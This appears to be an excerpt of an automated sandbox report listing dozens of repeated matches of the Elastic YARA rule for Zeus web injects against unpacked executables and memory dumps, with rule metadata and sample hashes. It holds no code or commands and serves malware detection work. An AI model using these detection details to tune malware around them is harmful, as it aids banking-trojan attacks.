Source: 25.2.nPtwtzGyOdAtB.exe.29f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.nPtwtzGyOdAtB.exe.3210000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.nPtwtzGyOdAtB.exe.1400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.nPtwtzGyOdAtB.exe.1400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nPtwtzGyOdAtB.exe.1322000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f340000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nPtwtzGyOdAtB.exe.2a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1991774796.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1985170745.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1980433347.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1985005669.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1964558264.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1869468125.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1995640935.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1948235173.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1964024407.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000F.00000002.1873568549.0000000002B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1980207397.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1963250031.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000026.00000002.1991998066.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1992856341.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1815491557.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1994050836.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1458207873.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1907200563.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1984832465.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1935549687.0000000001200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1810656396.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000026.00000002.1991709433.0000000002C00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
